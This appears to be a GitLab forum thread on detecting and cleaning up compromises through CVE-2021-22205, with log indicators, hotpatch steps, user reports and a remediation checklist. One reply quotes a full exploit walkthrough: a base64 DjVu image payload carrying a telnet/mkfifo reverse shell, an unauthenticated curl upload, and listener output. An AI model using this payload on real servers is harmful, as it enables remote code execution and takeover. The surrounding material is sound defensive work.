CVE-2021-22205: How to determine if a self-managed instance has been impacted

Using available logs provided by GitLab, it is possible to determine if a GitLab instance has been compromised through the exploitation of CVE-2021-22205. Note: this issue was remediated and patched in the GitLab 13.10.3, 13.9.6, and 13.8.8 releases from April 14, 2021: GitLab Critical Security Release: 13.10.3, 13.9.6, and 13.8.8 | GitLab.

All information provided here should be considered examples of information that could be found in log files. It is not intended to be an exhaustive list of possible log entries. As such, log entries and indicators of compromise (IOCs) will vary slightly depending upon deployment configurations and malicious actor exploitation tactics. By default, GitLab instances maintain 30 days of log data. If the activity associated with a compromised instance occurred outside of this retention window, it is unlikely that similar IOC log entries will exist. Additionally, since logs rotate daily, the .*.gz files contained in each of the mentioned log directories should also be searched.

Log events indicating a compromise will exist in the GitLab Workhorse current log file at /var/log/gitlab/gitlab-workhorse/current, which will contain an ExifTool error log entry from the time the vulnerability was exploited. For example:

{
  "correlation_id": "01FEPNG60XWAQ9K5EE3GB909Q6",
  "filename": "exploit.jpg",
  "level": "info",
  "msg": "running exiftool to remove any metadata",
  "time": "2021-09-03T20:27:16Z"
}
{
  "command": [
    "exiftool",
    "-all=",
    "--IPTC:all",
    "--XMP-iptcExt:all",
    "-tagsFromFile",
    "@",
    "-ResolutionUnit",
    "-XResolution",
    "-YResolution",
    "-YCbCrSubSampling",
    "-YCbCrPositioning",
    "-BitsPerSample",
    "-ImageHeight",
    "-ImageWidth",
    "-ImageSize",
    "-Copyright",
    "-CopyrightNotice",
    "-Orientation",
    "-"
  ],
  "correlation_id": "01FEPNG60XWAQ9K5EE3GB909Q6",
  "error": "exit status 1",
  "level": "info",
  "msg": "exiftool command failed",
  "stderr": "Error: Writing of this type of file is not supported - -\n",
  "time": "2021-09-03T20:27:17Z"
}

Another example from the gitlab-workhorse logs following exploitation of this vulnerability is:

{"command":["exiftool","-all=","--IPTC:all","--XMP-iptcExt:all","-tagsFromFile","@","-ResolutionUnit","-XResolution","-YResolution","-YCbCrSubSampling","-YCbCrPositioning","-BitsPerSample","-ImageHeight","-ImageWidth","-ImageSize","-Copyright","-CopyrightNotice","-Orientation","-"],"correlation_id":"01FKBH8HB3A5YR8S7PYYB5A8SN","error":"signal: killed","level":"info","msg":"exiftool command failed","stderr":"sh: 1: Trying: not found\nsh: 2: Connected: not found\nsh: 3: Escape: not found\nConnection closed by foreign host.\n","time":"2021-10-31T11:07:18-07:00"}
{"correlation_id":"01FKBH8HB3A5YR8S7PYYB5A8SN","error":"error while removing EXIF","level":"error","method":"POST","msg":"","time":"2021-10-31T11:07:18-07:00","uri":"/e7c6305189bc5bd5"}
{"content_type":"text/html; charset=utf-8","correlation_id":"01FKBH8HB3A5YR8S7PYYB5A8SN","duration_ms":7636442,"host":"10.0.0.7","level":"info","method":"POST","msg":"access","proto":"HTTP/1.1","referrer":"","remote_addr":"127.0.0.1:0","remote_ip":"127.0.0.1","route":"","status":422,"system":"http","time":"2021-10-31T11:07:18-07:00","ttfb_ms":7636436,"uri":"/e7c6305189bc5bd5","user_agent":"curl/7.47.0","written_bytes":2936}

A "msg":"exiftool command failed" entry and an "error":"error while removing EXIF" entry in the gitlab-workhorse logs may be indicators of (attempted) exploitation of CVE-2021-22205.
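One quick way to search for these indicators, including the rotated .gz files mentioned above, is with grep and zgrep. This is only a sketch and assumes the default Omnibus log locations; adjust the paths for other deployment types:

# search the current Workhorse log and any rotated logs for the indicators above
grep -E 'exiftool command failed|error while removing EXIF' /var/log/gitlab/gitlab-workhorse/current
zgrep -E 'exiftool command failed|error while removing EXIF' /var/log/gitlab/gitlab-workhorse/*.gz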

Correlating the timestamps from the workhorse logs with the NGINX access logs in /var/log/gitlab/nginx/gitlab_access.log can help identify the IP address of the attacker. However, it should be understood that, depending on the network architecture and instance deployment configuration, the identified IP address may not be that of the malicious actor.

192.168.1.50 - - [03/Sep/2021:06:27:08 +0000] "GET /users/sign_in HTTP/1.1" 200 3193 "" "python-requests/2.25.1" 2.46
192.168.1.50 - - [03/Sep/2021:06:27:08 +0000] "POST /users/sign_in HTTP/1.1" 200 3371 "" "python-requests/2.25.1" 2.46
192.168.1.50 - - [03/Sep/2021:06:27:09 +0000] "GET /api/v4/projects?per_page=1000 HTTP/1.1" 200 2 "" "python-requests/2.25.1" -
192.168.1.50 - - [03/Sep/2021:06:27:09 +0000] "GET /help HTTP/1.1" 302 120 "" "python-requests/2.25.1" -
192.168.1.50 - - [03/Sep/2021:06:27:10 +0000] "GET /users/sign_in HTTP/1.1" 200 3379 "" "python-requests/2.25.1" 2.46
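As a rough sketch (the timestamp and log path are just the example values used above), the matching access-log entries can be pulled out directly:

# list requests logged in the same minute as the suspicious upload, including rotated logs
grep '03/Sep/2021:06:27' /var/log/gitlab/nginx/gitlab_access.log
zgrep '03/Sep/2021:06:27' /var/log/gitlab/nginx/*.gz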

In many exploitation cases investigated, the malicious actor created a new account on the instance. Attempts to log in and access the instance through the API can be found and correlated in production_json.log, located at /var/log/gitlab/gitlab-rails/production_json.log, using the IP address identified previously.

{
  "method": "POST",
  "path": "/users/sign_in",
  "format": "*/*",
  "controller": "SessionsController",
  "action": "new",
  "status": 200,
  "time": "2021-09-03T06:27:08.960Z",
  "params": [
    {
      "key": "utf8",
      "value": "%E2%9C%93"
    },
    {
      "key": "authenticity_token",
      "value": "[FILTERED]"
    },
    {
      "key": "user",
      "value": {
        "login": "dexbcxh",
        "password": "[FILTERED]",
        "remember_me": "0"
      }
    }
  ],
  "remote_ip": "192.168.1.50",
  "user_id": null,
  "username": null,
  "ua": "python-requests/2.25.1"
}
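Because production_json.log contains one JSON object per line, jq (if available on the host) can filter on the IP address identified earlier. A minimal sketch using the example IP from above:

# show requests made from the suspect IP, with the fields most useful for triage
jq 'select(.remote_ip == "192.168.1.50") | {time, method, path, status, username, ua}' /var/log/gitlab/gitlab-rails/production_json.log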

Available in GitLab v12.3 and later, the auth.log located at /var/log/gitlab/gitlab-rails/auth.log can also be used to identify attempted and successful user logins. While not an all-inclusive list, some of the most common email addresses and usernames used by malicious actors are as follows (see the example search after the list):

User emails:

Usernames:

  • dexbcx
  • dexbcx818
  • dexbcxh
  • dexbcxi
  • dexbcxa99
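A quick, non-exhaustive way to search for these names is sketched below. All of the usernames listed share the dexbcx prefix, so a single pattern covers them; extend it with any other suspicious names found during the investigation:

# search current and rotated Rails logs for the known-bad username prefix
grep 'dexbcx' /var/log/gitlab/gitlab-rails/auth.log /var/log/gitlab/gitlab-rails/production_json.log
zgrep 'dexbcx' /var/log/gitlab/gitlab-rails/*.gz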

Additional information and details regarding logging with GitLab can be found online in our GitLab Docs, under the Log system subsection.


Any user running a vulnerable version of GitLab should upgrade to a patched version as soon as possible, preferably the latest version of GitLab.

If upgrading immediately is not an option:

Mitigations & Workarounds

Hotpatch

Anyone running a vulnerable, public-facing GitLab self-managed instance unable to immediately upgrade to a patched version can apply a patch as a temporary hotfix. Applying this patch will change the relevant code to prevent further exploitation of the vulnerability.

The commands to run on a GitLab Omnibus Linux installation are:

sudo su
cd ~
curl -JLO https://gitlab.com/gitlab-org/build/CNG/-/raw/master/gitlab-ruby/patches/allow-only-tiff-jpeg-exif-strip.patch
cd /opt/gitlab/embedded/lib/exiftool-perl
patch -p2 < ~/allow-only-tiff-jpeg-exif-strip.patch

If you're running a vulnerable version, can't upgrade immediately, and can't apply the hotpatch for whatever reason, you can:

Replace exiftool script with cat -

This workaround will prevent all stripping of exif data from uploaded images.

Replace /opt/gitlab/embedded/bin/exiftool with a file containing this content:

#!/bin/bash

cat -

If needed, chmod a+x exiftool to ensure it's executable.
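One possible way to apply this on an Omnibus install, keeping a copy of the original binary so the change can be reverted after upgrading (adjust the path if your installation differs):

# back up the original ExifTool wrapper
sudo mv /opt/gitlab/embedded/bin/exiftool /opt/gitlab/embedded/bin/exiftool.orig
# replace it with the pass-through script shown above and make it executable
printf '#!/bin/bash\ncat -\n' | sudo tee /opt/gitlab/embedded/bin/exiftool > /dev/null
sudo chmod a+x /opt/gitlab/embedded/bin/exiftool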

Important

These workarounds are applicable only on Rails / Workhorse nodes (anything with HTTP GitLab components exposed).

To remain patched against exploitation of this vulnerability while running vulnerable versions of GitLab SM accessible via the public internet:

  • You MUST perform the workaround every time GitLab is updated or reinstalled, until reaching version 13.10.3+ (for Linux package or source installation)
  • You must perform the workaround every time you update or deploy a fresh container. (for Docker / Kubernetes deployments)

We know for certain our instance was compromised by this vulnerability. We patched it immediately after finding out from our cloud provider, which warned us about a large amount of bytes being sent out. We have also deleted the admin accounts the attacker created. We also know it is this exiftool attack based on looking at our logs. After our patch, the bots continued uploading jpg files, and we can see exiftool now rejecting them in the logs. So it's fairly certain this is the same attacker as described in this vulnerability.

Since this vulnerability allowed the attacker to create admin-level users and API access, has anyone else seen any other behavior beyond the DDoS? We are currently reading through the uploaded images and checking what RCE they ran, but wanted to post this in case anyone else has found any other side effects.

Thank you

Hi!

We have an instance that was compromised and also received messages from our hosting provider that malicious traffic had been detected.

The GitLab instance has been updated to the latest version, but this afternoon malicious traffic was detected again. I can see in the workhorse logs that the upload was rejected, but I found in the temp files a malicious binary (under "/tmp/putin") that seemed to be responsible for spawning the processes I suspect were the source of the huge outbound traffic that triggered the hosting provider's alert.

Is there anything we need to clean up after the upgrade for the security breach to be closed properly? I also removed an account that was created in GitLab which was on the list of suspect usernames found in this thread.

Any help would be greatly appreciated! Thanks!

Thank you for the hot fix, as I cannot work through the upgrade right away. However, when I tried to follow the upgrade path, I found that the following file is missing from the repository: gitlab-ce-13.8.8-ce.0.sles15.x86_64.rpm, while only the one for aarch64 is present. Does anybody have this file?

Hello, I am experiencing the same issue. Did you resolve it in any way? I upgraded to v14.

Hi!

I don't know if I got all the offending pieces of malware, but my method was to comb through the GitLab Workhorse logs related to exiftool and track all the malicious scripts that were executed by the image upload method (the cURL calls could be clearly seen in the logs). I found mainly two of them hiding in temporary folders (/tmp and /var/tmp in my case) and downloaded them onto an isolated VM to look at their contents. They were downloading software and masquerading it with alternate names. What killed it too was that they added crontab configurations to self-download at regular intervals, so that even if you deleted the files, they'd come back. One of the crontabs was named "bkp-cron", making it look like something legit. I deleted all the crons and files and I believe I removed the traces of the different attacks.
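For anyone doing a similar cleanup, a rough sketch of these checks (the paths and the git user are just common defaults; adapt them to your own setup):

# list cron entries for root and the git user, plus system-wide cron locations
sudo crontab -l -u root
sudo crontab -l -u git
ls -la /etc/cron.d /etc/cron.daily /var/spool/cron 2>/dev/null
# list recently created or modified files in the temp directories mentioned above
find /tmp /var/tmp -type f -mtime -30 -ls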

Good luck with your cleanup!

It would be much appreciated if you could guide me through this in more detail, or show me how to stop the scripts, at least the ones you found.

Since they can do RCE, they can probably do privilege escalation as well, since getting the initial foothold is the harder part. Setting up a firewall or putting the instance behind something like a VPN will be safer.

(I wrote this when @ralfaro's post first appeared, but for some reason I didn't send it.) I think it's good that GitLab published information like this. I'm less impressed that it happened so long after patched versions came out. The vulnerability was not present in 13.11, which came out in April.

A malicious actor exploiting CVE-2021-22205 may leave scripts or crontab entries that persist even after the GitLab instance has been patched or upgraded.

If you're running a patched or updated GitLab version and there's evidence your system is still compromised, consider backing up your GitLab data and restoring it on a fresh server.


In my case, I patched to 14.4 yesterday and Workhorse is still logging activity. No system root crontab was accessible to them, but they tried. And here's the thing: I think they somehow programmed jobs to look like a legit project, but GitLab's interface doesn't detect them, only Workhorse does.

Here are the latest exiftool log entries:

{"correlation_id":"01FM1SSKGHKV156MYXGANN64W1","filename":"l.jpg","imageType":1,"level":"info","msg":"invalid content type, not running exiftool","time":"2021-11-09T07:32:27Z"}
{"client_mode":"local","copied_bytes":767,"correlation_id":"01FM1SSKGHKV156MYXGANN64W1","is_local":true,"is_multipart":false,"is_remote":false,"level":"info","local_temp_path":"/opt/gitlab/embedded/service/gitlab-rails/public/uploads/tmp","msg":"saved file","remote_id":"","temp_file_prefix":"l.jpg","time":"2021-11-09T07:32:27Z"}
{"content_type":"text/html; charset=utf-8","correlation_id":"01FM1SSKGHKV156MYXGANN64W1","duration_ms":43,"host":"[MY IP ADDRESS]","level":"info","method":"POST","msg":"access","proto":"HTTP/1.1","referrer":"","remote_addr":"[TARGET IP ADDRESS]","remote_ip":"[TARGET IP ADDRESS]","route":"","status":404,"system":"http","time":"2021-11-09T07:32:27Z","ttfb_ms":40,"uri":"/9y38mzr4pcus5x62","user_agent":"python-requests/2.26.0","written_bytes":3108}

As you can see, the jpg files were located at /opt/gitlab/embedded/service/gitlab-rails/public/uploads/tmp. Now that I have deleted it, the POST attempts return 204 responses, but the script is still running. Any tips for me?


I just patched our system because it was also compromised. I see a few admin users were created, which I will delete. But I also see some access tokens that look to have been recently added under the root login. See attached screenshot. I was going to remove them, but I want to be sure they're not supposed to be there?

Thanks!
-Chris


Hello,

I'm currently facing a similar problem. Does anyone know if this vulnerability is fixed in GitLab CE 14.4.0-ce.0?

Thank you.

Somehow, I feel that GitLab should have been more proactive in alerting about this and in gathering information on how to clean an exploited instance.

I got three users added as admins on 1/11, and also three API tokens created under my admin account, which I revoked.

I've been running GitLab in a Docker instance. How does it work with uploaded files: are they deleted when I shut down and upgrade to the latest version, or do I need to manually remove some uploaded images now?

Also, another thing I don't quite get with this exploit: how is it possible that someone who doesn't have an account on my GitLab instance, which is closed for signups, can upload image files without being logged in?


Could you let me know the log locations?

I found this helpful in this circumstance.

See below, or go to the source here: AttackerKB source

Attack Path & Exploit

The confusion around the privilege required to exploit this vulnerability is odd. Unauthenticated and remote users have been, and still are, able to reach execution of ExifTool via GitLab by design. Specifically, HandleFileUploads in uploads.go is called from a couple of PreAuthorizeHandler contexts, allowing the HandleFileUploads logic, which calls down to rewrite.go and exif.go, to execute before authentication.

The fall-out of this design decision is interesting in that an attacker needs none of the following:

  • Authentication

  • A CSRF token

  • A valid HTTP endpoint

As such, the following curl command is sufficient to reach, and exploit, ExifTool:

curl -v -F 'file=@echo_vakzz.jpg' http://10.0.0.8/$(openssl rand -hex 8)

In the example above, I reference echo_vakzz.jpg, which is the original exploit provided by @wcbowling in their HackerOne disclosure to GitLab. The file is a DjVu image that tricks ExifTool into calling eval on user-provided text embedded in the image. Technically speaking, this is an entirely separate issue in ExifTool. @wcbowling provides an excellent explanation here.

But for the purpose of GitLab exploitation, now that we know how easy it is to reach ExifTool, it's only important to know how to generate a payload. A very simple method was posted on the OSS-Security mailing list by Jakub Wilk back in May, but it is limited in the characters it can use. So here is a reverse shell that reaches out to 10.0.0.3:1270, made by building off of @wcbowling's original exploit.

albinolobster@ubuntu:~$ echo -e "QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs=" | base64 -d > lol.jpg
albinolobster@ubuntu:~$ echo -n 'TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF' >> lol.jpg
albinolobster@ubuntu:~$ echo -n "fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg==" | base64 -d >> lol.jpg

We can substitute the generated lol.jpg into the curl command like so:

albinolobster@ubuntu:~/Downloads$ curl -v -F 'file=@lol.jpg' http://10.0.0.7/$(openssl rand -hex 8)
*   Trying 10.0.0.7...
* Connected to 10.0.0.7 (10.0.0.7) port 80 (#0)
> POST /e7c6305189bc5bd5 HTTP/1.1
> Host: 10.0.0.7
> User-Agent: curl/7.47.0
> Accept: */*
> Content-Length: 912
> Expect: 100-continue
> Content-Type: multipart/form-data; boundary=------------------------ae83551d0544c303
>
< HTTP/1.1 100 Continue

The resulting reverse shell looks like the following:

albinolobster@ubuntu:~$ nc -lnvp 1270
Listening on [0.0.0.0] (family 0, port 1270)
Connection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport 34836)
whoami
git
id
uid=998(git) gid=998(git) groups=998(git)


Ah, thanks. I have tested that 13.0.14 was affected by this, but version 13.12.8 has fixed it. It's a bit scary, as ExifTool is used everywhere. I hope the GitLab team has filled all the holes.

If this RCE vulnerability was exploited on your instance, it's possible that abuse or malicious user access to the system may persist even after upgrading or patching GitLab.

Unfortunately, there is no one-size-fits-all solution or comprehensive checklist one can use to completely secure a server that has been compromised. GitLab recommends following your organization's established incident response plan whenever possible.

The suggestions below may help mitigate the threat of further abuse or a malicious actor having persistent access, but this list is not comprehensive or exhaustive.

GitLab-specific:

  • Audit user accounts and delete suspicious accounts created in the past several months (see the example after this list)
  • Review the GitLab logs and server logs for suspicious activity, such as activities taken by any user accounts detected in the user audit.
  • Rotate admin / privileged API tokens
  • Rotate sensitive credentials/variables/tokens/secrets (located in instance configuration, database, CI pipelines, or elsewhere)
  • Check for suspicious files (particularly those owned by git user and/or located in tmp directories)
  • Migrate GitLab data to a new server
  • Check for crontab / cronjob entries added by the git user
  • Upgrade to the latest version and adopt a plan to upgrade after every security patch release
  • Review project source code for suspicious modifications
  • Check for newly added or modified GitLab Runners
  • Check for suspicious webhooks or git hooks
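As one possible starting point for the user-account audit, the Users API can list administrators so that recently created admin accounts stand out. This is only a sketch: gitlab.example.com and <admin-token> are placeholders, and jq is optional.

# list admin users and show when each account was created
curl --header "PRIVATE-TOKEN: <admin-token>" "https://gitlab.example.com/api/v4/users?admins=true&per_page=100" | jq '.[] | {username, email, created_at}'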

Additionally, the suggestions below are common steps taken in incident response plans when servers are compromised by malicious actors.

  • Look for unrecognized background processes
  • Review network logs for uncommon traffic
  • Check for open ports on the system
  • Establish network monitoring and network-level controls
  • Restrict access to the instance at the network level (restrict access to authorized users/machines only)
  • Decommission servers that were compromised
  • Migrate data on the compromised server to a new server with all the latest security patches

This is an important check to do; it looks like we've seen evidence of this vector in active use. It'd be a way for an attacker to re-establish control of the system.

Check in every repo for custom hooks in /var/opt/gitlab/git-data/repositories/@hashed/*/*/*.git/custom_hooks/* (and / or the relevant path for Git repos still using legacy storage)
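A quick sketch for listing anything under that default hashed-storage path (adjust for legacy storage or non-Omnibus installs):

sudo find /var/opt/gitlab/git-data/repositories -type d -name custom_hooks -exec ls -la {} \;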

Check also for any added server hooks.

To find out where these are put on from-source and Omnibus installs, and also where repository hooks are stored (by default) on a from-source install, check out the custom hooks docs.
